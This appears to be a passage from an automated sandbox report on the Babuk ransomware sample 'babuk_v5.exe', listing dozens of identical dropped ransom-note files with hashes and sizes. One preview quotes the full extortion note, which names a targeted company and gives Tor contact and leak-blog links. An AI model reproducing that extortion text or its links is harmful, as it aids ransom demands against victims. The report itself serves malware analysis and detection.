                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-BE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CD\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-FR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-HT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-LU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-MA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-MC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-ML\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-RE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-SN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\gl-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ha-Latn-NG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\he-IL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hi-IN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hr-BA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hr-HR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hu-HU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\hy-AM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\id-ID\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\it-CH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\it-IT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ka-GE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\kk-KZ\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\lt-LT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\lv-LV\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\mk-MK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ms-BN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ms-MY\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\nb-NO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\nl-BE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\nl-NL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\pl-PL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\pt-BR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\pt-PT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ro-MD\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ro-RO\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\ru-RU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sk-SK\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sl-SI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sq-AL\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-BA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-ME\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Cyrl-RS\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-BA\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-ME\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-RS\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sv-FI\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\sv-SE\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\tr-TR\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\uk-UA\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Microsoft\input\uz-Latn-UZ\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
